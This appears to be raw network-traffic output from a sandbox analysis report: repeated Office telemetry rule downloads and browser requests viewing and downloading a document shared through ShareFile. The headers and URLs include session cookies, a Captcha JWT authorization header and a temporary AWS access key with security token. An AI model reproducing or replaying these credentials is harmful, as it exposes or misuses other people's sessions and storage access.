            Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /service/contentviewer/eventpipeline/preview?r=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..YT-7joZ7NA2xJ98-T9_XuA.2Zph08aowS0-5EaN3lDemssPeK_hexaYBZgqHeveaWGy33G2UP89dirumsTrXJr8-0g7HbTBOqy49qHmPlFUUXdVp2IctMjMZtPcczQi_o6kJUt977_grmdvLV0bp9ccGB1FlGK8dfi-Qir9vfdnwo05YQZSt0CNAtqu86IZR-nYXHicMzkZVe01Go9fN1OyAaGnqXYvpYYhv9U0TxlIC1ONH6AbawzqrnLXYF2LYvQI8-eNeEgKF4I7k6oE8XFqMNL3Ltl_ng1TERQAK3t0XPZYn2cuzODzEomXT-iPIkne5xaV_VpGKoRgSSD_MWuaSLIqK0wOgcpN5OnepRL8fO1gX0GJmB0KNZOOsnxWi6-cqscge4TSUaKL2XvFVesOn1u7P0RXN1Ju32Wl3Z5MIvcm-8tdPc2HM_bPoXQgF-enAnRhBAzILMuNnbEzXcCI.8eEIXvw0gw5oDgQWJSluhw HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/pdfworker.71b2fed3d97c2433b14536a2de71ac7a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=wgmSc3aRk32MwzBSgBgV0pizSR6ad+bk7LVuZctGoUMxqjSX4m+hv13rQ8ctipSTAhpTmR7ZPOMcxitWyiONz2D0tV8TJ4wm4Ps8HSa2Eprs+gCy803gUANVibuXUG8ic5WipiSuc6QWDg2boXHTutRFtK/3uo38gN4qdXX6InLh; AWSALBTGCORS=wgmSc3aRk32MwzBSgBgV0pizSR6ad+bk7LVuZctGoUMxqjSX4m+hv13rQ8ctipSTAhpTmR7ZPOMcxitWyiONz2D0tV8TJ4wm4Ps8HSa2Eprs+gCy803gUANVibuXUG8ic5WipiSuc6QWDg2boXHTutRFtK/3uo38gN4qdXX6InLh; AWSALB=g9O3kTTme+nDAtcIlq2WDAoWFYR6xucpnnlSb0FvTWdgceVQ4zWM16ESSVM8mQkksEVR3hxtuRlx/BaV1dZViBKPmK8pc3Fq3bBayKi+W1qh9iORZg4QdwLtQdbE; AWSALBCORS=g9O3kTTme+nDAtcIlq2WDAoWFYR6xucpnnlSb0FvTWdgceVQ4zWM16ESSVM8mQkksEVR3hxtuRlx/BaV1dZViBKPmK8pc3Fq3bBayKi+W1qh9iORZg4QdwLtQdbE
            Source: global trafficHTTP traffic detected: GET /renderx/RenderOutput/a8050891-1b71-8816-99a8-d7f55d4cb952/bf1404eb713727c9c1b94f43cdbcf96e?AWSAccessKeyId=ASIAWSHYYC7RX4NBFTKI&Expires=1728500445&x-amz-security-token=IQoJb3JpZ2luX2VjEAoaCXVzLWVhc3QtMSJHMEUCIQDjjfBcchRSP%2FBCM3YxxqIENxXpn6qIMWVIyx2tzmSkmgIgIf%2FTQA6d39VacGZljzpNmUVm1lJDeev6i1Ok5sIXy88qvAUIYxAAGgw0NTE0OTMyMzg3NTUiDCKUhEuQjy2VXwhFviqZBV1bg2Nw4Td8dlBMBHc4QRDmPxnEGlF0rCJ6F5V8eo9wtRo7%2B7AMHllzXJpAkDOvaola5E6MhICEnNdJ3Gq6PTZKLzi6saiZNN8KwpbnZbADcbRGw3f5AyFNhkmrkPFxw%2B1%2F8nHLJ00YGIEaW47s%2BfCyTBVIDNnk1wrKj4sWa4OM%2BSX6mhK18iYtO3VRSJK5yafACvtwauMlKWFwm4B27oiuAoT4TPVU55m7JaoWAZa%2B%2FdLQXWsurPhVi6f90waeWVpbcD2OsLBCJrv7yy9L0bs8FhcwS%2FKbCNned2TQjnBGIw%2F1bErGFMzkjPB26reCx2OycVYk%2BEl14LWejqJxdmNUp2tVNIgUOPRFw1XGqdXxEDfC0dBg%2F383U9XJ2FkunCTVwelyA5oCKJp5u9bkN%2FkP1CrqJKKazcOnvAm6aFqQSh4L61QLlnIwr9PgDkZ0o9Sbs1pfQVB%2B8lSKC%2F%2FFO8ML%2BdyuQy%2BSDQAVnIsA7YmqNj70%2Fw6EKynQPIqKgIgfh3q0KH4%2FMfhg7r%2F54cYkoI7hEpubuwficZdyAFdp1rAe%2FrlFIdk2Sv0IcQiYDDVWsTnRRMx6aJtrnT6AWSTM%2BN%2B3HPU%2FZ11at%2BHFXBod9XP87pJSMx7epXCTY4KoKOdroObBlJaLfKaD%2BuQKKhhN%2FjoD8U2olrluq3Q1Z1YRfDZ%2BeRSlTU8o7AjcdbQ%2BYuIyY6e6Jf1rZ8BFTqW48hCFYRYZMm6b5%2B%2FJzwXG70lAFBxjvuNqd0MtOwDfrVVxegt0M7QydkFCdRJF1em3AL5r6EWZrzTob1TMDTn4CLA42mD%2BZEwBLNI8d2WZMcmPyvkNiwRuMjGi3oNrJLPKtxvAIAspPtT4a9GENUJL1qYVlG2NM0coMGI2kJQXMKL%2FmrgGOrEB3%2BZxvxs3ZqUevb%2FRwi8VFqmkEvYLTk%2BcaAy4i7bFgf9i0H97asJZCjwiFyaAzON2bd1cZIJ5p5rNJfoxZGEBNKqWq21wNFmGjyJEqEwxAujOL9MvHPMNyvMbZIOrXqFrL0yJLCBwqhNTSYyYICdLX18LEHynp9D7yPomEifVCMMV7oV6QBeDT7LZzU5kbrCQju1b9Hv14YQUvGNjj4r3A%2FCy7Ee2zqQB9RaY%2FUGmo5mC&Signature=vwOltpSbaBnc1QQpmhVmTwKA4%2F0%3D HTTP/1.1Host: sf-temp-us-east-1-production.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=0-65535
            Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /renderx/RenderOutput/a8050891-1b71-8816-99a8-d7f55d4cb952/bf1404eb713727c9c1b94f43cdbcf96e?AWSAccessKeyId=ASIAWSHYYC7RX4NBFTKI&Expires=1728500445&x-amz-security-token=IQoJb3JpZ2luX2VjEAoaCXVzLWVhc3QtMSJHMEUCIQDjjfBcchRSP%2FBCM3YxxqIENxXpn6qIMWVIyx2tzmSkmgIgIf%2FTQA6d39VacGZljzpNmUVm1lJDeev6i1Ok5sIXy88qvAUIYxAAGgw0NTE0OTMyMzg3NTUiDCKUhEuQjy2VXwhFviqZBV1bg2Nw4Td8dlBMBHc4QRDmPxnEGlF0rCJ6F5V8eo9wtRo7%2B7AMHllzXJpAkDOvaola5E6MhICEnNdJ3Gq6PTZKLzi6saiZNN8KwpbnZbADcbRGw3f5AyFNhkmrkPFxw%2B1%2F8nHLJ00YGIEaW47s%2BfCyTBVIDNnk1wrKj4sWa4OM%2BSX6mhK18iYtO3VRSJK5yafACvtwauMlKWFwm4B27oiuAoT4TPVU55m7JaoWAZa%2B%2FdLQXWsurPhVi6f90waeWVpbcD2OsLBCJrv7yy9L0bs8FhcwS%2FKbCNned2TQjnBGIw%2F1bErGFMzkjPB26reCx2OycVYk%2BEl14LWejqJxdmNUp2tVNIgUOPRFw1XGqdXxEDfC0dBg%2F383U9XJ2FkunCTVwelyA5oCKJp5u9bkN%2FkP1CrqJKKazcOnvAm6aFqQSh4L61QLlnIwr9PgDkZ0o9Sbs1pfQVB%2B8lSKC%2F%2FFO8ML%2BdyuQy%2BSDQAVnIsA7YmqNj70%2Fw6EKynQPIqKgIgfh3q0KH4%2FMfhg7r%2F54cYkoI7hEpubuwficZdyAFdp1rAe%2FrlFIdk2Sv0IcQiYDDVWsTnRRMx6aJtrnT6AWSTM%2BN%2B3HPU%2FZ11at%2BHFXBod9XP87pJSMx7epXCTY4KoKOdroObBlJaLfKaD%2BuQKKhhN%2FjoD8U2olrluq3Q1Z1YRfDZ%2BeRSlTU8o7AjcdbQ%2BYuIyY6e6Jf1rZ8BFTqW48hCFYRYZMm6b5%2B%2FJzwXG70lAFBxjvuNqd0MtOwDfrVVxegt0M7QydkFCdRJF1em3AL5r6EWZrzTob1TMDTn4CLA42mD%2BZEwBLNI8d2WZMcmPyvkNiwRuMjGi3oNrJLPKtxvAIAspPtT4a9GENUJL1qYVlG2NM0coMGI2kJQXMKL%2FmrgGOrEB3%2BZxvxs3ZqUevb%2FRwi8VFqmkEvYLTk%2BcaAy4i7bFgf9i0H97asJZCjwiFyaAzON2bd1cZIJ5p5rNJfoxZGEBNKqWq21wNFmGjyJEqEwxAujOL9MvHPMNyvMbZIOrXqFrL0yJLCBwqhNTSYyYICdLX18LEHynp9D7yPomEifVCMMV7oV6QBeDT7LZzU5kbrCQju1b9Hv14YQUvGNjj4r3A%2FCy7Ee2zqQB9RaY%2FUGmo5mC&Signature=vwOltpSbaBnc1QQpmhVmTwKA4%2F0%3D HTTP/1.1Host: sf-temp-us-east-1-production.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=196608-244653If-Range: "1dfe4f9feb95b0513faaaac475c5b58f"
            Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /renderx/RenderOutput/a8050891-1b71-8816-99a8-d7f55d4cb952/bf1404eb713727c9c1b94f43cdbcf96e?AWSAccessKeyId=ASIAWSHYYC7RX4NBFTKI&Expires=1728500445&x-amz-security-token=IQoJb3JpZ2luX2VjEAoaCXVzLWVhc3QtMSJHMEUCIQDjjfBcchRSP%2FBCM3YxxqIENxXpn6qIMWVIyx2tzmSkmgIgIf%2FTQA6d39VacGZljzpNmUVm1lJDeev6i1Ok5sIXy88qvAUIYxAAGgw0NTE0OTMyMzg3NTUiDCKUhEuQjy2VXwhFviqZBV1bg2Nw4Td8dlBMBHc4QRDmPxnEGlF0rCJ6F5V8eo9wtRo7%2B7AMHllzXJpAkDOvaola5E6MhICEnNdJ3Gq6PTZKLzi6saiZNN8KwpbnZbADcbRGw3f5AyFNhkmrkPFxw%2B1%2F8nHLJ00YGIEaW47s%2BfCyTBVIDNnk1wrKj4sWa4OM%2BSX6mhK18iYtO3VRSJK5yafACvtwauMlKWFwm4B27oiuAoT4TPVU55m7JaoWAZa%2B%2FdLQXWsurPhVi6f90waeWVpbcD2OsLBCJrv7yy9L0bs8FhcwS%2FKbCNned2TQjnBGIw%2F1bErGFMzkjPB26reCx2OycVYk%2BEl14LWejqJxdmNUp2tVNIgUOPRFw1XGqdXxEDfC0dBg%2F383U9XJ2FkunCTVwelyA5oCKJp5u9bkN%2FkP1CrqJKKazcOnvAm6aFqQSh4L61QLlnIwr9PgDkZ0o9Sbs1pfQVB%2B8lSKC%2F%2FFO8ML%2BdyuQy%2BSDQAVnIsA7YmqNj70%2Fw6EKynQPIqKgIgfh3q0KH4%2FMfhg7r%2F54cYkoI7hEpubuwficZdyAFdp1rAe%2FrlFIdk2Sv0IcQiYDDVWsTnRRMx6aJtrnT6AWSTM%2BN%2B3HPU%2FZ11at%2BHFXBod9XP87pJSMx7epXCTY4KoKOdroObBlJaLfKaD%2BuQKKhhN%2FjoD8U2olrluq3Q1Z1YRfDZ%2BeRSlTU8o7AjcdbQ%2BYuIyY6e6Jf1rZ8BFTqW48hCFYRYZMm6b5%2B%2FJzwXG70lAFBxjvuNqd0MtOwDfrVVxegt0M7QydkFCdRJF1em3AL5r6EWZrzTob1TMDTn4CLA42mD%2BZEwBLNI8d2WZMcmPyvkNiwRuMjGi3oNrJLPKtxvAIAspPtT4a9GENUJL1qYVlG2NM0coMGI2kJQXMKL%2FmrgGOrEB3%2BZxvxs3ZqUevb%2FRwi8VFqmkEvYLTk%2BcaAy4i7bFgf9i0H97asJZCjwiFyaAzON2bd1cZIJ5p5rNJfoxZGEBNKqWq21wNFmGjyJEqEwxAujOL9MvHPMNyvMbZIOrXqFrL0yJLCBwqhNTSYyYICdLX18LEHynp9D7yPomEifVCMMV7oV6QBeDT7LZzU5kbrCQju1b9Hv14YQUvGNjj4r3A%2FCy7Ee2zqQB9RaY%2FUGmo5mC&Signature=vwOltpSbaBnc1QQpmhVmTwKA4%2F0%3D HTTP/1.1Host: sf-temp-us-east-1-production.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=65536-196607If-Range: "1dfe4f9feb95b0513faaaac475c5b58f"
            Source: global trafficHTTP traffic detected: GET /bundles/2bd6acf87747a8fbd76a.gif HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=u3zyQpYPmn5Jzy4T39zO7dJuKi0QV9EyHA6FCpbCE6ehUTvToZ9IykKYKUpNge6TY0v2vzINDn5s4bHH+xSda3NCvygaS/+YmXeVdcXlfaZlpAlGGq2oRXOggIL3/NUxesJQDiNUTnI5WQsKyWnTk3IBHI1XbH64a7lA0vTvESsx; AWSALBTGCORS=u3zyQpYPmn5Jzy4T39zO7dJuKi0QV9EyHA6FCpbCE6ehUTvToZ9IykKYKUpNge6TY0v2vzINDn5s4bHH+xSda3NCvygaS/+YmXeVdcXlfaZlpAlGGq2oRXOggIL3/NUxesJQDiNUTnI5WQsKyWnTk3IBHI1XbH64a7lA0vTvESsx; AWSALB=+imZGurbIwF8ME0zuI4i7dl0wPNfwzmGTFZ9/WN4g1wClczLrvqsF08HfzSlqbJj+EHeBXT0keorsbUdJ9wUuIMhbXeuYlJuGISuyS6aWzcEp/c3cQ+kgZ8h5zCV; AWSALBCORS=+imZGurbIwF8ME0zuI4i7dl0wPNfwzmGTFZ9/WN4g1wClczLrvqsF08HfzSlqbJj+EHeBXT0keorsbUdJ9wUuIMhbXeuYlJuGISuyS6aWzcEp/c3cQ+kgZ8h5zCV
            Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/2bd6acf87747a8fbd76a.gif HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=4YvX4paSMaSsuIKXg1ScPfvmZX3ZP31yyfSVbpwNnLvb8QzAyzu/UwJdA90t42tWrP+1zEaZwik3yN7Igfi+bZyv/uC+aDdSUx02UPk98jV1VJ+mJa6aKFWOkpzP5plrkJjXV67PKP8bX0JGvICL3ZcaSSHa16UMtEEHdtuYaeAx; AWSALBTGCORS=4YvX4paSMaSsuIKXg1ScPfvmZX3ZP31yyfSVbpwNnLvb8QzAyzu/UwJdA90t42tWrP+1zEaZwik3yN7Igfi+bZyv/uC+aDdSUx02UPk98jV1VJ+mJa6aKFWOkpzP5plrkJjXV67PKP8bX0JGvICL3ZcaSSHa16UMtEEHdtuYaeAx; AWSALB=dJGG3ZNQzzBZsSZrqPj24WyXDVYoPzz66VhrZuDzW9keej2Q+uJpk+nXSn2qRwqjfHZnZbpJoLzfpgDh+iw9Rk2J07d2Ce+qxG1569iZlvCDeRzXS1aV0z8MOZ3K; AWSALBCORS=dJGG3ZNQzzBZsSZrqPj24WyXDVYoPzz66VhrZuDzW9keej2Q+uJpk+nXSn2qRwqjfHZnZbpJoLzfpgDh+iw9Rk2J07d2Ce+qxG1569iZlvCDeRzXS1aV0z8MOZ3K
            Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s065a23040fe44344860f6d1dd5810a52)/Recipients(189361297164461c)/DownloadWithAlias?id=fi43d59f-f50a-8b6c-92c5-82617c12046b&redirect=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: IzoXVYhPWxL0a77Q3chjRgsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMwNjVhMjMwNDBmZTQ0MzQ0ODYwZjZkMWRkNTgxMGE1MiIsIkV4cGlyZXMiOjE3Mjg0OTg5MzR9.Y4AJ6PQtgj2M2hRvc6eXJhhxLt4TdW-c4HGWWZb80FYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=eAfl5fTxZ4HsumjiKEdoMP5QeL8gEzoM0XDGToutgEaR+CAdKdf9g50myPgjAjo2FCuOZnXuSf++GWHj71/uupvK/bLDeshZN211V2T9w65rMgI5N8xvBr+zfzVyjF1nGLfvtPacs4FGF48BJpCw8Ge8x2YU1gzdo2x+Zk9lHQHx; AWSALBCORS=ZcbUzsToBDLFyg3ntehfeG8HihHezENx4cUws8ICmvwmGhD7jvcNZHOsDpt64lsjlXE2l0gO85iRe+7NvEkE1Xk11jUazRyUycmhLPZV023Xnt1G2l1eUBrYxi1M
            Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s065a23040fe44344860f6d1dd5810a52)/Recipients(189361297164461c)/DownloadWithAlias?id=fi43d59f-f50a-8b6c-92c5-82617c12046b&redirect=false HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=eAfl5fTxZ4HsumjiKEdoMP5QeL8gEzoM0XDGToutgEaR+CAdKdf9g50myPgjAjo2FCuOZnXuSf++GWHj71/uupvK/bLDeshZN211V2T9w65rMgI5N8xvBr+zfzVyjF1nGLfvtPacs4FGF48BJpCw8Ge8x2YU1gzdo2x+Zk9lHQHx; AWSALB=ZcbUzsToBDLFyg3ntehfeG8HihHezENx4cUws8ICmvwmGhD7jvcNZHOsDpt64lsjlXE2l0gO85iRe+7NvEkE1Xk11jUazRyUycmhLPZV023Xnt1G2l1eUBrYxi1M; AWSALBTGCORS=O87+cYi1DIKNn9LzMRHhTxEY5hoAcZEMRj3B+5PH3Z/yP37CeZ9V24suwsPQVq96xg0sy28PRJ7werVUuD7Aoh6aWAai1wlh3vbT2y3bJa4Ex4i49GvpMeKhWOBbiXxHTirvXdxOvbRUOrBcserUgZxNqoCirDDzzE7O2U6jXxfU; 